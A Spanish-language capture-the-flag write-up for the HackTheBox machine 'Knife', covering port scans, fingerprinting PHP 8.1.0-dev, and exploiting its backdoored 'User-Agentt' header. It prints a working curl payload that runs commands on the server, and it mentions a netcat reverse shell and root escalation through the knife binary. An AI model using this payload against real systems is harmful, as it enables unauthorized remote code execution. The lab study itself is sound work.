Knife - HackTheBox
Comencé con un escaneo de Nmap para detectar puertos abiertos.
┌──(root💀kali)-[/home/kali/HTB/Knife]
└─# nmap -sS --min-rate=5000 -n -vvv --open -Pn 10.10.10.242 -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 10:07 EDT
Initiating SYN Stealth Scan at 10:07
Scanning 10.10.10.242 [1000 ports]
Discovered open port 22/tcp on 10.10.10.242
Discovered open port 80/tcp on 10.10.10.242
Completed SYN Stealth Scan at 10:07, 0.41s elapsed (1000 total ports)
Nmap scan report for 10.10.10.242
Host is up, received user-set (0.11s latency).
Scanned at 2021-08-29 10:07:20 EDT for 0s
Not shown: 998 closed ports
Reason: 998 resets
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds
Raw packets sent: 1012 (44.528KB) | Rcvd: 1012 (40.488KB)
Efectúe otro escaneo para detectar la versión de cada servicio abierto encontrado.
┌──(root💀kali)-[/home/kali/HTB/Knife]
└─# nmap -sC -sV -p22,80 10.10.10.242 -oN targeted
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 10:09 EDT
Nmap scan report for 10.10.10.242
Host is up (0.034s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds
Vi que corría un servidor web, accedí a él y encontré lo siguiente.
Las secciones que habían no eran botones por lo que poco podía hacer, le hice un whatweb al servidor web para ver que estaba corriendo.
┌──(root💀kali)-[/home/kali/HTB/Knife]
└─# whatweb http://10.10.10.242/
http://10.10.10.242/ [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.242], PHP[8.1.0-dev], Script, Title[Emergent Medical Idea], X-Powered-By[PHP/8.1.0-dev]
Encontré que corría PHP, eso me llamo la atención, envíe una petición por GET y al parecer whatweb lo reporta de la cabecera X-Powered-By.
Busque si había algún exploit de esa versión y encontré uno que te garantizaba ejecución de código arbitrario.
┌──(root💀kali)-[/home/kali/HTB/Knife]
└─# searchsploit PHP 8.1.0-dev
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Concrete5 CMS < 8.3.0 - Username / Comments Enumeration | php/webapps/44194.py
cPanel < 11.25 - Cross-Site Request Forgery (Add User PHP Script) | php/webapps/17330.html
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
FileRun < 2017.09.18 - SQL Injection | php/webapps/42922.py
Fozzcom Shopping < 7.94 / < 8.04 - Multiple Vulnerabilities | php/webapps/15571.txt
FreePBX < 13.0.188 - Remote Command Execution (Metasploit) | php/remote/40434.rb
IceWarp Mail Server < 11.1.1 - Directory Traversal | php/webapps/44587.txt
KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities | php/webapps/46956.txt
Kaltura < 13.2.0 - Remote Code Execution | php/webapps/43028.py
Kaltura Community Edition < 11.1.0-2 - Multiple Vulnerabilities | php/webapps/39563.txt
Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit) | php/webapps/45083.rb
NPDS < 08.06 - Multiple Input Validation Vulnerabilities | php/webapps/32689.txt
OPNsense < 19.1.1 - Cross-Site Scripting | php/webapps/46351.txt
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py
Plesk < 9.5.4 - Remote Command Execution | php/remote/25986.txt
REDCap < 9.1.2 - Cross-Site Scripting | php/webapps/47146.txt
Responsive FileManager < 9.13.4 - Directory Traversal | php/webapps/45271.txt
Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure | php/webapps/41272.txt
ShoreTel Connect ONSITE < 19.49.1500.0 - Multiple Vulnerabilities | php/webapps/46666.txt
Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit) | php/remote/28407.rb
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities | php/webapps/39553.txt
Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting | php/webapps/46815.txt
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Lo transferí a mí máquina con el parámetro -m de searchsploit.
┌──(root💀kali)-[/home/kali/HTB/Knife]
└─# searchsploit -m php/webapps/49933.py
Exploit: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
URL: https://www.exploit-db.com/exploits/49933
Path: /usr/share/exploitdb/exploits/php/webapps/49933.py
File Type: HTML document, ASCII text, with CRLF line terminators
Copied to: /home/kali/HTB/Knife/49933.py
Tras ver lo que hacía por detrás encontré que envía una petición añadiendo una cabecera nueva llamada User-Agentt que ejecuta la siguiente sentencia zerodiumsystem("comando");
y ganas RCE.
Lo hice de manera manual con curl.
┌──(root💀kali)-[/home/kali/HTB/Knife]
└─# curl -X GET http://10.10.10.242/ -H "User-Agentt: zerodiumsystem('whoami');"
james
<!DOCTYPE html>
<html lang="en" >
<head>
<meta charset="UTF-8">
Al parecer si funciono, me ejecuto el comando que yo quería y me reporto el “output” en la primera línea del código fuente de la página, ahora solo faltaba ganar acceso al sistema, por ello me entable una reverse Shell por netcat, para ello use una de mkfifo.
Y gané acceso a la máquina.
ESCALADA DE PRIVILEGIOS
Hice un tratamiento de la TTY y encontré que se podía ejecutar el binario knife con el usuario root.
Fui a gtfobins y encontré que se podía escalar ejecutando el binario knife.
Lo ejecute y gane acceso a la máquina como root y ya pude visualizar la “flag”.
Leave a comment